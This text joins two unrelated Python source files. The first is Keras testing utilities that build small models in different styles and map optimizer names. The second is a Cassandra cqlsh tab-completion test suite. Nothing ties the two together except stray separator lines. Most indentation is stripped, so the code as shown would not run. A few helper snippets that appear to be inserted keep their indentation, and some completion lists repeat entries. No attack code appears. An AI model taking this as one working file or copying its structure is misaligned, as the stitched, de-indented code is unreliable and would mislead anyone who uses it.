(layer_cls.__name__,
x,
actual_output_shape,
expected_output_shape,
kwargs))
if expected_output is not None:
np.testing.assert_allclose(actual_output, expected_output, rtol=1e-3)
# test serialization, weight setting at model level
model_config = model.get_config()
recovered_model = keras.models.Sequential.from_config(model_config)
if model.weights:
weights = model.get_weights()
recovered_model.set_weights(weights)
output = recovered_model.predict(input_data)
np.testing.assert_allclose(output, actual_output, rtol=1e-3)
# for further checks in the caller function
return actual_output
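# Illustrative usage (layer and shapes chosen arbitrarily): exercise a Dense
# layer through the functional, Sequential and serialization checks above.
def _example_layer_test():
  return layer_test(
      keras.layers.Dense,
      kwargs={'units': 3},
      input_shape=(2, 4),
      expected_output_dtype='float32')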
_thread_local_data = threading.local()
_thread_local_data.model_type = None
_thread_local_data.run_eagerly = None
@tf_contextlib.contextmanager
def model_type_scope(value):
"""Provides a scope within which the model type to test is equal to `value`.
The model type gets restored to its original value upon exiting the scope.
Arguments:
value: model type value
Yields:
The provided value.
"""
previous_value = _thread_local_data.model_type
try:
_thread_local_data.model_type = value
yield value
finally:
# Restore model type to initial value.
_thread_local_data.model_type = previous_value
@tf_contextlib.contextmanager
def run_eagerly_scope(value):
"""Provides a scope within which we compile models to run eagerly or not.
The boolean gets restored to its original value upon exiting the scope.
Arguments:
value: Bool specifying if we should run models eagerly in the active test.
Should be True or False.
Yields:
The provided value.
"""
previous_value = _thread_local_data.run_eagerly
try:
_thread_local_data.run_eagerly = value
yield value
finally:
    # Restore run_eagerly to its initial value.
_thread_local_data.run_eagerly = previous_value
def should_run_eagerly():
"""Returns whether the models we are testing should be run eagerly."""
if _thread_local_data.run_eagerly is None:
raise ValueError('Cannot call `should_run_eagerly()` outside of a '
'`run_eagerly_scope()` or `run_all_keras_modes` '
'decorator.')
return _thread_local_data.run_eagerly and context.executing_eagerly()
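# Illustrative usage: derive the compile-time `run_eagerly` flag from the
# enclosing scope, mirroring what run_all_keras_modes-style decorators do.
def _example_compile_in_run_eagerly_scope(model):
  with run_eagerly_scope(True):
    model.compile('rmsprop', 'mse', run_eagerly=should_run_eagerly())
  return model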
def get_model_type():
"""Gets the model type that should be tested."""
if _thread_local_data.model_type is None:
raise ValueError('Cannot call `get_model_type()` outside of a '
'`model_type_scope()` or `run_with_all_model_types` '
'decorator.')
return _thread_local_data.model_type
def get_small_sequential_mlp(num_hidden, num_classes, input_dim=None):
model = keras.models.Sequential()
if input_dim:
model.add(keras.layers.Dense(num_hidden, activation='relu',
input_dim=input_dim))
else:
model.add(keras.layers.Dense(num_hidden, activation='relu'))
activation = 'sigmoid' if num_classes == 1 else 'softmax'
model.add(keras.layers.Dense(num_classes, activation=activation))
return model
def get_small_functional_mlp(num_hidden, num_classes, input_dim):
inputs = keras.Input(shape=(input_dim,))
outputs = keras.layers.Dense(num_hidden, activation='relu')(inputs)
activation = 'sigmoid' if num_classes == 1 else 'softmax'
outputs = keras.layers.Dense(num_classes, activation=activation)(outputs)
return keras.Model(inputs, outputs)
class _SmallSubclassMLP(keras.Model):
"""A subclass model based small MLP."""
def __init__(self, num_hidden, num_classes):
super(_SmallSubclassMLP, self).__init__()
self.layer_a = keras.layers.Dense(num_hidden, activation='relu')
activation = 'sigmoid' if num_classes == 1 else 'softmax'
self.layer_b = keras.layers.Dense(num_classes, activation=activation)
def call(self, inputs, **kwargs):
x = self.layer_a(inputs)
return self.layer_b(x)
class _SmallSubclassMLPCustomBuild(keras.Model):
"""A subclass model small MLP that uses a custom build method."""
def __init__(self, num_hidden, num_classes):
super(_SmallSubclassMLPCustomBuild, self).__init__()
self.layer_a = None
self.layer_b = None
self.num_hidden = num_hidden
self.num_classes = num_classes
def build(self, input_shape):
self.layer_a = keras.layers.Dense(self.num_hidden, activation='relu')
activation = 'sigmoid' if self.num_classes == 1 else 'softmax'
self.layer_b = keras.layers.Dense(self.num_classes, activation=activation)
def call(self, inputs, **kwargs):
x = self.layer_a(inputs)
return self.layer_b(x)
def get_small_subclass_mlp(num_hidden, num_classes):
return _SmallSubclassMLP(num_hidden, num_classes)
def get_small_subclass_mlp_with_custom_build(num_hidden, num_classes):
return _SmallSubclassMLPCustomBuild(num_hidden, num_classes)
def get_small_mlp(num_hidden, num_classes, input_dim):
"""Get a small mlp of the model type specified by `get_model_type`."""
model_type = get_model_type()
if model_type == 'subclass':
return get_small_subclass_mlp(num_hidden, num_classes)
if model_type == 'subclass_custom_build':
return get_small_subclass_mlp_with_custom_build(num_hidden, num_classes)
if model_type == 'sequential':
return get_small_sequential_mlp(num_hidden, num_classes, input_dim)
if model_type == 'functional':
return get_small_functional_mlp(num_hidden, num_classes, input_dim)
raise ValueError('Unknown model type {}'.format(model_type))
class _SubclassModel(keras.Model):
"""A Keras subclass model."""
def __init__(self, layers):
super(_SubclassModel, self).__init__()
    # Note that clone and build don't support lists of layers in subclassed
    # models, so each layer is added directly here.
for i, layer in enumerate(layers):
setattr(self, self._layer_name_for_i(i), layer)
self.num_layers = len(layers)
def _layer_name_for_i(self, i):
return 'layer{}'.format(i)
def call(self, inputs, **kwargs):
x = inputs
for i in range(self.num_layers):
layer = getattr(self, self._layer_name_for_i(i))
x = layer(x)
return x
class _SubclassModelCustomBuild(keras.Model):
"""A Keras subclass model that uses a custom build method."""
def __init__(self, layer_generating_func):
super(_SubclassModelCustomBuild, self).__init__()
self.all_layers = None
self._layer_generating_func = layer_generating_func
def build(self, input_shape):
layers = []
for layer in self._layer_generating_func():
layers.append(layer)
self.all_layers = layers
def call(self, inputs, **kwargs):
x = inputs
for layer in self.all_layers:
x = layer(x)
return x
def get_model_from_layers(layers, input_shape=None):
"""Builds a model from a sequence of layers."""
model_type = get_model_type()
if model_type == 'subclass':
return _SubclassModel(layers)
if model_type == 'subclass_custom_build':
layer_generating_func = lambda: layers
return _SubclassModelCustomBuild(layer_generating_func)
if model_type == 'sequential':
model = keras.models.Sequential()
if input_shape:
model.add(keras.layers.InputLayer(input_shape=input_shape))
for layer in layers:
model.add(layer)
return model
if model_type == 'functional':
if not input_shape:
raise ValueError('Cannot create a functional model from layers with no '
'input shape.')
inputs = keras.Input(shape=input_shape)
outputs = inputs
for layer in layers:
outputs = layer(outputs)
return keras.Model(inputs, outputs)
raise ValueError('Unknown model type {}'.format(model_type))
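# Illustrative usage: build the same layer stack as a functional model by
# pairing get_model_from_layers with model_type_scope.
def _example_functional_model_from_layers():
  with model_type_scope('functional'):
    return get_model_from_layers(
        [keras.layers.Dense(4, activation='relu'), keras.layers.Dense(1)],
        input_shape=(8,))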
class _MultiIOSubclassModel(keras.Model):
"""Multi IO Keras subclass model."""
def __init__(self, branch_a, branch_b, shared_input_branch=None,
shared_output_branch=None):
super(_MultiIOSubclassModel, self).__init__()
self._shared_input_branch = shared_input_branch
self._branch_a = branch_a
self._branch_b = branch_b
self._shared_output_branch = shared_output_branch
def call(self, inputs, **kwargs):
if self._shared_input_branch:
for layer in self._shared_input_branch:
inputs = layer(inputs)
a = inputs
b = inputs
else:
a, b = inputs
for layer in self._branch_a:
a = layer(a)
for layer in self._branch_b:
b = layer(b)
outs = [a, b]
if self._shared_output_branch:
for layer in self._shared_output_branch:
outs = layer(outs)
return outs
class _MultiIOSubclassModelCustomBuild(keras.Model):
"""Multi IO Keras subclass model that uses a custom build method."""
def __init__(self, branch_a_func, branch_b_func,
shared_input_branch_func=None,
shared_output_branch_func=None):
super(_MultiIOSubclassModelCustomBuild, self).__init__()
self._shared_input_branch_func = shared_input_branch_func
self._branch_a_func = branch_a_func
self._branch_b_func = branch_b_func
self._shared_output_branch_func = shared_output_branch_func
self._shared_input_branch = None
self._branch_a = None
self._branch_b = None
self._shared_output_branch = None
def build(self, input_shape):
if self._shared_input_branch_func():
self._shared_input_branch = self._shared_input_branch_func()
self._branch_a = self._branch_a_func()
self._branch_b = self._branch_b_func()
if self._shared_output_branch_func():
self._shared_output_branch = self._shared_output_branch_func()
def call(self, inputs, **kwargs):
if self._shared_input_branch:
for layer in self._shared_input_branch:
inputs = layer(inputs)
a = inputs
b = inputs
else:
a, b = inputs
for layer in self._branch_a:
a = layer(a)
for layer in self._branch_b:
b = layer(b)
outs = a, b
if self._shared_output_branch:
for layer in self._shared_output_branch:
outs = layer(outs)
return outs
def get_multi_io_model(
branch_a,
branch_b,
shared_input_branch=None,
shared_output_branch=None):
"""Builds a multi-io model that contains two branches.
The produced model will be of the type specified by `get_model_type`.
To build a two-input, two-output model:
Specify a list of layers for branch a and branch b, but do not specify any
shared input branch or shared output branch. The resulting model will apply
each branch to a different input, to produce two outputs.
The first value in branch_a must be the Keras 'Input' layer for branch a,
and the first value in branch_b must be the Keras 'Input' layer for
branch b.
example usage:
```
branch_a = [Input(shape=(2,), name='a'), Dense(), Dense()]
branch_b = [Input(shape=(3,), name='b'), Dense(), Dense()]
model = get_multi_io_model(branch_a, branch_b)
```
To build a two-input, one-output model:
Specify a list of layers for branch a and branch b, and specify a
shared output branch. The resulting model will apply
each branch to a different input. It will then apply the shared output
branch to a tuple containing the intermediate outputs of each branch,
to produce a single output. The first layer in the shared_output_branch
must be able to merge a tuple of two tensors.
The first value in branch_a must be the Keras 'Input' layer for branch a,
and the first value in branch_b must be the Keras 'Input' layer for
branch b.
example usage:
```
input_branch_a = [Input(shape=(2,), name='a'), Dense(), Dense()]
input_branch_b = [Input(shape=(3,), name='b'), Dense(), Dense()]
shared_output_branch = [Concatenate(), Dense(), Dense()]
model = get_multi_io_model(input_branch_a, input_branch_b,
shared_output_branch=shared_output_branch)
```
To build a one-input, two-output model:
Specify a list of layers for branch a and branch b, and specify a
shared input branch. The resulting model will take one input, and apply
the shared input branch to it. It will then respectively apply each branch
to that intermediate result in parallel, to produce two outputs.
The first value in the shared_input_branch must be the Keras 'Input' layer
for the whole model. Branch a and branch b should not contain any Input
layers.
example usage:
```
shared_input_branch = [Input(shape=(2,), name='in'), Dense(), Dense()]
output_branch_a = [Dense(), Dense()]
output_branch_b = [Dense(), Dense()]
model = get_multi_io_model(output_branch_a, output_branch_b,
shared_input_branch=shared_input_branch)
```
Args:
branch_a: A sequence of layers for branch a of the model.
branch_b: A sequence of layers for branch b of the model.
shared_input_branch: An optional sequence of layers to apply to a single
input, before applying both branches to that intermediate result. If set,
the model will take only one input instead of two. Defaults to None.
shared_output_branch: An optional sequence of layers to merge the
intermediate results produced by branch a and branch b. If set,
the model will produce only one output instead of two. Defaults to None.
Returns:
A multi-io model of the type specified by `get_model_type`, built from
the given branches.
"""
# Extract the functional inputs from the layer lists
if shared_input_branch:
inputs = shared_input_branch[0]
shared_input_branch = shared_input_branch[1:]
else:
inputs = branch_a[0], branch_b[0]
branch_a = branch_a[1:]
branch_b = branch_b[1:]
model_type = get_model_type()
if model_type == 'subclass':
return _MultiIOSubclassModel(branch_a, branch_b, shared_input_branch,
shared_output_branch)
if model_type == 'subclass_custom_build':
return _MultiIOSubclassModelCustomBuild((lambda: branch_a),
(lambda: branch_b),
(lambda: shared_input_branch),
(lambda: shared_output_branch))
if model_type == 'sequential':
raise ValueError('Cannot use `get_multi_io_model` to construct '
'sequential models')
if model_type == 'functional':
if shared_input_branch:
a_and_b = inputs
for layer in shared_input_branch:
a_and_b = layer(a_and_b)
a = a_and_b
b = a_and_b
else:
a, b = inputs
for layer in branch_a:
a = layer(a)
for layer in branch_b:
b = layer(b)
outputs = a, b
if shared_output_branch:
for layer in shared_output_branch:
outputs = layer(outputs)
return keras.Model(inputs, outputs)
raise ValueError('Unknown model type {}'.format(model_type))
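# Illustrative sketch (not part of the original utilities): building the
# two-input, two-output variant documented above. Assumes `keras` is the
# module-level import used elsewhere in this file and that `get_model_type()`
# has been configured to a type supported by `get_multi_io_model`; the layer
# sizes are arbitrary.
def _example_build_two_input_two_output_model():
  branch_a = [keras.Input(shape=(2,), name='a'),
              keras.layers.Dense(4, activation='relu'),
              keras.layers.Dense(1)]
  branch_b = [keras.Input(shape=(3,), name='b'),
              keras.layers.Dense(4, activation='relu'),
              keras.layers.Dense(1)]
  return get_multi_io_model(branch_a, branch_b)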
_V2_OPTIMIZER_MAP = {
'adadelta': adadelta_v2.Adadelta,
'adagrad': adagrad_v2.Adagrad,
'adam': adam_v2.Adam,
'adamax': adamax_v2.Adamax,
'nadam': nadam_v2.Nadam,
'rmsprop': rmsprop_v2.RMSprop,
'sgd': gradient_descent_v2.SGD
}
def get_v2_optimizer(name, **kwargs):
"""Get the v2 optimizer requested.
This is only necessary until v2 optimizers are the default, as we are testing
in Eager, and Eager + v1 optimizers fail tests. Once v2 is the default, the
strings alone should be sufficient, and this mapping can theoretically be removed.
Args:
name: string name of Keras v2 optimizer.
**kwargs: any kwargs to pass to the optimizer constructor.
Returns:
Initialized Keras v2 optimizer.
Raises:
ValueError: if an unknown name was passed.
"""
try:
return _V2_OPTIMIZER_MAP[name](**kwargs)
except KeyError:
raise ValueError(
'Could not find requested v2 optimizer: {}\nValid choices: {}'.format(
name, list(_V2_OPTIMIZER_MAP.keys())))
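# Illustrative sketch (not part of the original utilities): fetching a v2
# optimizer by name and falling back to SGD when the name is unknown. The
# fallback policy is an example, not an established convention of this module.
def _example_get_optimizer_or_default(name='adam', **kwargs):
  try:
    return get_v2_optimizer(name, **kwargs)
  except ValueError:
    # Unknown optimizer name: fall back to plain SGD with the same kwargs.
    return gradient_descent_v2.SGD(**kwargs)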
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# To configure behavior, set $CQL_TEST_HOST to the destination address
# and $CQL_TEST_PORT to the associated port.
from __future__ import with_statement
import re
from .basecase import BaseTestCase, cqlsh
from .cassconnect import testrun_cqlsh
import unittest
import sys
BEL = '\x07' # the terminal-bell character
CTRL_C = '\x03'
TAB = '\t'
# Completions not printed within this many seconds are not counted.
# Tune if needed for a slow system, but be aware that each completion test
# will need to wait this long, to make sure no more output is coming.
COMPLETION_RESPONSE_TIME = 0.5
completion_separation_re = re.compile(r'\s+')
@unittest.skipIf(sys.platform == "win32", 'Tab completion tests not supported on Windows')
class CqlshCompletionCase(BaseTestCase):
def setUp(self):
self.cqlsh_runner = testrun_cqlsh(cqlver=None, env={'COLUMNS': '100000'})
self.cqlsh = self.cqlsh_runner.__enter__()
def tearDown(self):
self.cqlsh_runner.__exit__(None, None, None)
def _get_completions(self, inputstring, split_completed_lines=True):
"""
Get results of tab completion in cqlsh. Returns a bare string if the
input completes immediately to a single completion. Otherwise, returns a set of all
whitespace-separated tokens in the offered completions by default, or a
list of the lines in the offered completions if split_completed_lines is
False.
"""
self.cqlsh.send(inputstring)
self.cqlsh.send(TAB)
immediate = self.cqlsh.read_up_to_timeout(COMPLETION_RESPONSE_TIME)
immediate = immediate.replace(' \b', '')
self.assertEqual(immediate[:len(inputstring)], inputstring)
immediate = immediate[len(inputstring):]
immediate = immediate.replace(BEL, '')
if immediate:
return immediate
self.cqlsh.send(TAB)
choice_output = self.cqlsh.read_up_to_timeout(COMPLETION_RESPONSE_TIME)
if choice_output == BEL:
choice_output = ''
self.cqlsh.send(CTRL_C) # cancel any current line
self.cqlsh.read_to_next_prompt()
choice_lines = choice_output.splitlines()
if choice_lines:
# ensure the last line of the completion is the prompt
prompt_regex = self.cqlsh.prompt.lstrip() + re.escape(inputstring)
msg = ('Double-tab completion '
'does not print prompt for input "{}"'.format(inputstring))
self.assertRegexpMatches(choice_lines[-1], prompt_regex, msg=msg)
choice_lines = [line.strip() for line in choice_lines[:-1]]
choice_lines = [line for line in choice_lines if line]
if split_completed_lines:
completed_lines = [set(completion_separation_re.split(line.strip()))
                   for line in choice_lines]
if not completed_lines:
return set()
completed_tokens = set.union(*completed_lines)
return completed_tokens - {''}
else:
return choice_lines
assert False
def _trycompletions_inner(self, inputstring, immediate='', choices=(),
other_choices_ok=False,
split_completed_lines=True):
"""
Test tab completion in cqlsh. Enters in the text in inputstring, then
simulates a tab keypress to see what is immediately completed (this
should only happen when there is only one completion possible). If
there is an immediate completion, the new text is expected to match
'immediate'. If there is no immediate completion, another tab keypress
is simulated in order to get a list of choices, which are expected to
match the items in 'choices' (order is not important, but case is).
"""
completed = self._get_completions(inputstring,
split_completed_lines=split_completed_lines)
if immediate:
msg = 'cqlsh completed %r, but we expected %r' % (completed, immediate)
self.assertEqual(completed, immediate, msg=msg)
return
if other_choices_ok:
self.assertEqual(set(choices), completed.intersection(choices))
else:
self.assertEqual(set(choices), set(completed))
def trycompletions(self, inputstring, immediate='', choices=(),
other_choices_ok=False, split_completed_lines=True):
try:
self._trycompletions_inner(inputstring, immediate, choices,
other_choices_ok=other_choices_ok,
split_completed_lines=split_completed_lines)
finally:
self.cqlsh.send(CTRL_C) # cancel any current line
self.cqlsh.read_to_next_prompt()
def strategies(self):
return self.module.CqlRuleSet.replication_strategies
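# Illustrative sketch (not part of the test suite): how a single line of
# double-tab completion output is reduced to a token set, using the same
# regex as _get_completions above. The sample line is hypothetical.
def _example_tokenize_completion_line(line='ALTER   BEGIN   CAPTURE   COPY'):
    return set(completion_separation_re.split(line.strip())) - {''}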
class TestCqlshCompletion(CqlshCompletionCase):
cqlver = '3.1.6'
module = cqlsh.cql3handling
def test_complete_on_empty_string(self):
self.trycompletions('', choices=('?', 'ALTER', 'BEGIN', 'CAPTURE', 'CONSISTENCY',
'COPY', 'CREATE', 'DEBUG', 'DELETE', 'DESC', 'DESCRIBE',
'DROP', 'GRANT', 'HELP', 'INSERT', 'LIST', 'LOGIN', 'PAGING', 'REVOKE',
'SELECT', 'SHOW', 'SOURCE', 'TRACING', 'EXPAND', 'SERIAL', 'TRUNCATE',
'UPDATE', 'USE', 'exit', 'quit', 'CLEAR', 'CLS'))
def test_complete_command_words(self):
self.trycompletions('alt', '\b\b\bALTER ')
self.trycompletions('I', 'NSERT INTO ')
self.trycompletions('exit', ' ')
def test_complete_in_uuid(self):
pass
def test_complete_in_select(self):
pass
def test_complete_in_insert(self):
self.trycompletions('INSERT INTO ',
choices=('twenty_rows_table',
'ascii_with_special_chars',
'users',
'has_all_types',
'system.',
'empty_composite_table',
'empty_table',
'undefined_values_table',
'dynamic_columns',
'twenty_rows_composite_table',
'utf8_with_special_chars',
'system_traces.',
'songs'),
other_choices_ok=True)
self.trycompletions('INSERT INTO twenty_rows_composite_table',
immediate=' ')
self.trycompletions('INSERT INTO twenty_rows_composite_table ',
choices=['(', 'JSON'])
self.trycompletions('INSERT INTO twenty_rows_composite_table (a, b ',
choices=(')', ','))
self.trycompletions('INSERT INTO twenty_rows_composite_table (a, b, ',
immediate='c ')
self.trycompletions('INSERT INTO twenty_rows_composite_table (a, b, c ',
choices=(',', ')'))
self.trycompletions('INSERT INTO twenty_rows_composite_table (a, b)',
immediate=' VALUES ( ')
self.trycompletions('INSERT INTO twenty_rows_composite_table (a, b, c) VAL',
immediate='UES ( ')
self.trycompletions(
'INSERT INTO twenty_rows_composite_table (a, b, c) VALUES (',
['<value for a (text)>'],
split_completed_lines=False)
self.trycompletions(
"INSERT INTO twenty_rows_composite_table (a, b, c) VALUES ('",
['<value for a (text)>'],
split_completed_lines=False)
self.trycompletions(
"INSERT INTO twenty_rows_composite_table (a, b, c) VALUES ( 'eggs",
['<value for a (text)>'],
split_completed_lines=False)
self.trycompletions(
"INSERT INTO twenty_rows_composite_table (a, b, c) VALUES ('eggs'",
immediate=', ')
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs',"),
['<value for b (text)>'],
split_completed_lines=False)
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam')"),
immediate=' ')
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam') "),
choices=[';', 'USING', 'IF'])
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam');"),
choices=['?', 'ALTER', 'BEGIN', 'CAPTURE', 'CONSISTENCY', 'COPY',
'CREATE', 'DEBUG', 'DELETE', 'DESC', 'DESCRIBE', 'DROP',
'EXPAND', 'GRANT', 'HELP', 'INSERT', 'LIST', 'LOGIN', 'PAGING',
'REVOKE', 'SELECT', 'SHOW', 'SOURCE', 'SERIAL', 'TRACING',
'TRUNCATE', 'UPDATE', 'USE', 'exit', 'quit',
'CLEAR', 'CLS'])
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam') US"),
immediate='ING T')
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam') USING"),
immediate=' T')
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam') USING T"),
choices=['TTL', 'TIMESTAMP'])
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam') USING TT"),
immediate='L ')
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam') USING TI"),
immediate='MESTAMP ')
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam') USING TIMESTAMP "),
choices=['<wholenumber>'])
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam') USING TTL "),
choices=['<wholenumber>'])
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam') USING TIMESTAMP 0 "),
choices=['AND', ';'])
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam') USING TTL 0 "),
choices=['AND', ';'])
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam') USING TIMESTAMP 0 A"),
immediate='ND TTL ')
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam') USING TTL 0 A"),
immediate='ND TIMESTAMP ')
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam') USING TTL 0 AND TIMESTAMP "),
choices=['<wholenumber>'])
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam') USING TTL 0 AND TIMESTAMP 0 "),
choices=['AND', ';'])
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam') USING TTL 0 AND TIMESTAMP 0 AND "),
choices=[])
def test_complete_in_update(self):
self.trycompletions("UPD", immediate="ATE ")
self.trycompletions("UPDATE ",
choices=['twenty_rows_table',
'users', 'has_all_types', 'system.',
'ascii_with_special_chars',
'empty_composite_table', 'empty_table',
'undefined_values_table',
'dynamic_columns',
'twenty_rows_composite_table',
'utf8_with_special_chars',
'system_traces.', 'songs'],
other_choices_ok=True)
self.trycompletions("UPDATE empty_table ", choices=['USING', 'SET'])
self.trycompletions("UPDATE empty_table S",
immediate='ET lonelycol = ')
self.trycompletions("UPDATE empty_table SET lon",
immediate='elycol = ')
self.trycompletions("UPDATE empty_table SET lonelycol",
immediate=' = ')
self.trycompletions("UPDATE empty_table U", immediate='SING T')
self.trycompletions("UPDATE empty_table USING T",
choices=["TTL", "TIMESTAMP"])
self.trycompletions("UPDATE empty_table SET lonelycol = ",
choices=['<term (text)>'],
split_completed_lines=False)
self.trycompletions("UPDATE empty_table SET lonelycol = 'eg",
choices=['<term (text)>'],
split_completed_lines=False)
self.trycompletions("UPDATE empty_table SET lonelycol = 'eggs'",
choices=[',', 'WHERE'])
self.trycompletions("UPDATE empty_table SET lonelycol = 'eggs' WHERE ",
choices=['TOKEN(', 'lonelykey'])
self.trycompletions("UPDATE empty_table SET lonelycol = 'eggs' WHERE ",
choices=['TOKEN(', 'lonelykey'])
self.trycompletions("UPDATE empty_table SET lonelycol = 'eggs' WHERE lonel",
immediate='ykey ')
self.trycompletions("UPDATE empty_table SET lonelycol = 'eggs' WHERE lonelykey ",
choices=['=', '<=', '>=', '>', '<', 'CONTAINS', 'IN', '['])
self.trycompletions("UPDATE empty_table SET lonelycol = 'eggs' WHERE lonelykey = 0.0 ",
choices=['AND', 'IF', ';'])
self.trycompletions("UPDATE empty_table SET lonelycol = 'eggs' WHERE lonelykey = 0.0 AND ",
choices=['TOKEN(', 'lonelykey'])
self.trycompletions("UPDATE empty_table SET lonelycol = 'eggs' WHERE TOKEN(lonelykey ",
choices=[',', ')'])
self.trycompletions("UPDATE empty_table SET lonelycol = 'eggs' WHERE TOKEN(lonelykey) ",
choices=['=', '<=', '>=', '<', '>'])
self.trycompletions("UPDATE empty_table SET lonelycol = 'eggs' WHERE TOKEN(lonelykey) <= TOKEN(13) ",
choices=[';', 'AND', 'IF'])
self.trycompletions("UPDATE empty_table SET lonelycol = 'eggs' WHERE TOKEN(lonelykey) <= TOKEN(13) IF ",
choices=['EXISTS', '<quotedName>', '<identifier>'])
self.trycompletions("UPDATE empty_table SET lonelycol = 'eggs' WHERE TOKEN(lonelykey) <= TOKEN(13) IF EXISTS ",
choices=['>=', '!=', '<=', 'IN', '[', ';', '=', '<', '>', '.'])
def test_complete_in_delete(self):
self.trycompletions('DELETE F', choices=['FROM', '<identifier>', '<quotedName>'])
self.trycompletions('DELETE a ', choices=['FROM', '[', '.', ','])
self.trycompletions('DELETE a [',
choices=['<wholenumber>', 'false', '-', '<uuid>',
'<pgStringLiteral>', '<float>', 'TOKEN',
'<identifier>', '<quotedStringLiteral>',
'{', '[', 'NULL', 'true', '<blobLiteral>'])
self.trycompletions('DELETE a, ',
choices=['<identifier>', '<quotedName>'])
self.trycompletions('DELETE a FROM ',
choices=['twenty_rows_table',
'ascii_with_special_chars', 'users',
'has_all_types', 'system.',
'empty_composite_table', 'empty_table',
'system_auth.', 'undefined_values_table',
'dynamic_columns',
'twenty_rows_composite_table',
'utf8_with_special_chars',
'system_traces.', 'songs',
'"' + self.cqlsh.keyspace + '".'],
other_choices_ok=True)
self.trycompletions('DELETE FROM ',
choices=['twenty_rows_table',
'ascii_with_special_chars', 'users',
'has_all_types', 'system.',
'empty_composite_table', 'empty_table',
'system_auth.', 'undefined_values_table',
'dynamic_columns',
'twenty_rows_composite_table',
'utf8_with_special_chars',
'system_traces.', 'songs',
'system_auth.', 'system_distributed.',
'system_schema.', 'system_traces.',
'"' + self.cqlsh.keyspace + '".'],
other_choices_ok=True)
self.trycompletions('DELETE FROM twenty_rows_composite_table ',
choices=['USING', 'WHERE'])
self.trycompletions('DELETE FROM twenty_rows_composite_table U',
immediate='SING TIMESTAMP ')
self.trycompletions('DELETE FROM twenty_rows_composite_table USING TIMESTAMP ',
choices=['<wholenumber>'])
self.trycompletions('DELETE FROM twenty_rows_composite_table USING TIMESTAMP 0',
choices=['<wholenumber>'])
self.trycompletions('DELETE FROM twenty_rows_composite_table USING TIMESTAMP 0 ',
immediate='WHERE ')
self.trycompletions('DELETE FROM twenty_rows_composite_table USING TIMESTAMP 0 WHERE ',
choices=['a', 'b', 'TOKEN('])
self.trycompletions('DELETE FROM twenty_rows_composite_table USING TIMESTAMP 0 WHERE a ',
choices=['<=', '>=', 'CONTAINS', 'IN', '[', '=', '<', '>'])
self.trycompletions('DELETE FROM twenty_rows_composite_table USING TIMESTAMP 0 WHERE TOKEN(',
immediate='a ')
self.trycompletions('DELETE FROM twenty_rows_composite_table USING TIMESTAMP 0 WHERE TOKEN(a',
immediate=' ')
self.trycompletions('DELETE FROM twenty_rows_composite_table USING TIMESTAMP 0 WHERE TOKEN(a ',
choices=[')', ','])
self.trycompletions('DELETE FROM twenty_rows_composite_table USING TIMESTAMP 0 WHERE TOKEN(a) ',
choices=['>=', '<=', '=', '<', '>'])
self.trycompletions('DELETE FROM twenty_rows_composite_table USING TIMESTAMP 0 WHERE TOKEN(a) >= ',
choices=['false', 'true', '<pgStringLiteral>',
'token(', '-', '<float>', 'TOKEN',
'<identifier>', '<uuid>', '{', '[', 'NULL',
'<quotedStringLiteral>', '<blobLiteral>',
'<wholenumber>'])
self.trycompletions(('DELETE FROM twenty_rows_composite_table USING TIMESTAMP 0 WHERE '
'TOKEN(a) >= TOKEN(0) '),
choices=['AND', 'IF', ';'])
self.trycompletions(('DELETE FROM twenty_rows_composite_table USING TIMESTAMP 0 WHERE '
'TOKEN(a) >= TOKEN(0) IF '),
choices=['EXISTS', '<identifier>', '<quotedName>'])
self.trycompletions(('DELETE FROM twenty_rows_composite_table USING TIMESTAMP 0 WHERE '
'TOKEN(a) >= TOKEN(0) IF b '),
choices=['>=', '!=', '<=', 'IN', '=', '<', '>'])
self.trycompletions(('DELETE FROM twenty_rows_composite_table USING TIMESTAMP 0 WHERE '
'TOKEN(a) >= TOKEN(0) IF b < 0 '),
choices=['AND', ';'])
self.trycompletions(('DELETE FROM twenty_rows_composite_table USING TIMESTAMP 0 WHERE '
'TOKEN(a) >= TOKEN(0) IF b < 0 AND '),
choices=['<identifier>', '<quotedName>'])
self.trycompletions(("DELETE FROM twenty_rows_composite_table USING TIMESTAMP 0 WHERE "
"b = 'eggs'"),
choices=['AND', 'IF', ';'])
